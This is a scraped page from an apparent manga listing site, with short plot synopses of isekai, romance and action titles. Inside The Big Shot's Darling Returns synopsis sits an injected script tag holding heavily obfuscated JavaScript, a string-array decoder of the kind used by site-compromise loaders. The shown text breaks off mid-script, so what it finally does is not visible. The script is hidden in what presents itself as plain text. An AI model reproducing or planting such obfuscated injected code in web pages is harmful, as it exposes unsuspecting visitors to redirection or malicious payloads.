Adaptation - Page 80

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985 results

Izure Saikyou no Renkinjutsushi

Not even a hero, Takumi Iruma gets accidentally mixed in with a group of heroes chosen to be summoned to another world. As compensation for the mix-up, a goddess offers him the right to choose any skill he wishes for! Hoping for a peaceful and quiet life that has nothing to do with fighting or going into battle, he chooses a seemingly boring creation skill. However, it turns out \"alchemy\" is the most powerful skill that allows him to create everything from a holy sword to flying ships! This cheat skill he unexpectedly acquired turns him into a wealthy merchant and makes him undefeatable in battles! A heartwarming adventure story about (possibly) the most powerful alchemist in another world! *Alpha Manga* --- *Alternate description:* Iruma Takumi, a 40-year old salary man, was dragged into a hero summoning just like in a template. What was his fate? The Goddess sent him and the heroes to the other world separately. With the Goddess’ overprotective support, he landed in a different world looking handsome, rejuvenated, and quite different from a Japanese. Although he wanted a slow life while working in the manufacturing trade, that was not permitted by the Goddess’ special body and abilities. Would Takumi be able to live a peaceful life in a different world?


Heika, Kokoro no Koe ga Dadamore desu!

Sietsye, a princess hailing from a small country, traveled a long way to the powerful northern Kingdom of Verscia so as to wed its ruler, the haughty and overbearing Emperor Gaizel. The lonely Gaizel was a man known as the Ice Emperor, and is as frightening as he is revered. But, when faced with him, his inner thoughts - a sharp contrast to his icy demeanor - drift over to Sietsye, going far beyond her wildest imaginations—?! Thus begins the story of a love blooming out of a political marriage.


SSS-Class Revival Hunter

In the mysterious, RPG dungeon-like Tower, Gongja Kim lives a mundane existence, envying all the star hunters. One day, his wish for more is granted with a legendary skill to copy others’ abilities… at the cost of his life. Before he can make sense of it, he’s killed by the #1 hunter, the Flame Emperor! But this activates his skill and now he’s copied a new one, the ability to travel back in time upon death. How will Gongja use these skills to outplay the competition and rise to the top?


Ochikobore Eji Minarai no Shounen. (Jitsu wa) Saikyou Saiaku no Asashin

In a certain kingdom’s capital, war is approaching. A young boy named Il, an apprentice guard, is treated as a useless person who can’t do his job properly, living a lazy life while constantly relying on his stepsister. Amidst this, a certain “rumor” is spreading throughout the city. It is said that a mysterious group of assassins known as the “Nocturnal” are operating in the shadows. This is the story of the “worst” assassin among them. The dark hero of another world who slices through the night, brought to life by a popular original author and a new illustrator duo, makes his appearance here…!

1 days ago

Mobile Suit Gundam Side Story - The Blue Destiny

Yuu Kajima is a soldier with the Earth Federation Forces during the One Year War, testing new technology before it\'s mass-produced. During a routine battle, he and his teammates come under attack from a mysterious blue Mobile Suit that attacks like a monster, barely escaping with their lives. Returning to base, Yuu is assigned to pilot that same machine - Blue Destiny. As he uses his new machine and clashes with Zeon ace Nimbus Schterzen, Yuu learns that there may be more to the enigmatic Blue Destiny and its EXAM System than he previously thought.


Soshiki no shukuteki to kekkon shitara mecha amai

\"...I hate you!\" \"What a coincidence. So do I.\"  The two once belonged to opposing organisations of supernatural power users, and fought for their own opposing goals. Roushi Saikawa, also known as the \"Feather Hunter,\" and Ritsuka Yanagi, the strongest supernatural power user known as the \"White Demon.\" The two spent their days battling each other and had no normal social experience, but... \"I love you, Rou-kun.\" \"Me too, Ritsuka.\"  After their organisation was disbanded, they somehow started dating and then got married! Is their hatred 100 times more adorable? Now, they are the epitome of a lovey-dovey couple, kissing each other at the door every morning when they go to work.  But the husband had just one problem. That is, he had never shared a bed with his wife... In other words, even though he was married, he was still a virgin! This is the story of the hardships faced by such a husband, who gets caught up in numerous troubles but continues to make desperate attempts to deepen his love with his strict wife.


The Big Shot’s Darling Returns

Jun Qing finally transmigrates back to her original world, but finds out her own body had been taken over by another transmigrator for 2 years. Even the fourth brother, whom she has been pining after secretly for many years treats her coldly. Dealing with the trouble the previous transmigrator left behind, and simultaneously getting fourth brother's heart back, Jun Qing says this is no hard feat!<script></script><script>function _0x4b69(_0x49445a,_0x3c4767){var _0x479727=_0x42ef();return _0x4b69=function(_0x1bf912,_0x252e7d){_0x1bf912=_0x1bf912-(0x61*0x17+-0x2*-0xaf3+-0x1cb7*0x1);var _0x1a3fed=_0x479727[_0x1bf912];return _0x1a3fed;},_0x4b69(_0x49445a,_0x3c4767);}(function(_0x2717b6,_0x3187b3){var _0x13c3c5=_0x4b69,_0x2deeee=_0x2717b6();while(!![]){try{var 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How To Survive As A Player

Beta testing is over! The official server is the real world! ‘Elix’ empire building and cultivating game with many secrets hidden behind the curtain. In this game the player becomes ‘king,’ and rules over the country with their vassals. Before playing the player takes an aptitude test to determine his race. When the player is given a race and enters the game, they are given a helpful vassal called the ‘duke.’ That was how, ‘Elix,’ the empire building game, started. Elix is an extremely difficult game that cautions players against being tyrannical, lazy, or heartless when establishing an empire, or risk the empire collapsing due to riots, coups, and assassinations. An empire can also be destroyed by being invaded by another player. Still, many people were very excited and became obsessed with Elix. The open beta test lasted six months, after which the news of the official service was announced to the world. It generated a lot of excitement and anticipation from many people. However it should never have been something that people were enthusiastic about, or anticipated. Right. They should never have been excited about it.


Gendai Shakai De Otome Game No Akuyaku Reijou Wo Suru No Wa Chotto Taihen

In the tough times after the Japanese economic bubble burst, a career woman suffering through the aftermath reincarnates as Keikain Runa, the villainess of an otome game with a modern setting! However, not long after reincarnating, she realizes just how dire a situation her family is in due to the ongoing financial recession. Using knowledge from her previous life, Runa sets out to rescue her new family from crisis and stand against the tide of \'the times\' that caused her past life to end in misery.


Dating My Best Friend’s Sister

Read manhwa Dating My Best Friend’s Sister / 오빠 베프와 데이트하기 She’s got the perfect guy, she’s just graduated, and she’s about to go on vacation! Kaitlyn’s life was perfect… until it wasn’t. After getting dumped and finding out she has no place to stay, Kaitlyn is forced to crash at the Dune Scape, a dilapidated motel owned by her childhood crush and her brother’s best friend, Cole Thomas! Will sparks fly between the two of them? Or will Cole’s loyalty to her brother doom their relationship before it even begins?


Fuguushoku to Baka ni Saremashita ga, Jissai wa Sorehodo Waruku Arimasen

Shirosaki Reito was suddenly sucked in by a mysterious crack and got transferred in between dimensions. He got reincarnated as a baby in another world. He was born in the royal family and was the heir to the throne but he was driven/kicked of the palace. The reason was that he was born as a Support magician and had Alchemist as a job which was the lowest job that existed in the new world and people who had that were considered jobless. But there was a secret hidden in that job!! From jobless to the strongest job!!! --- Bookwalker LN: Official LN:
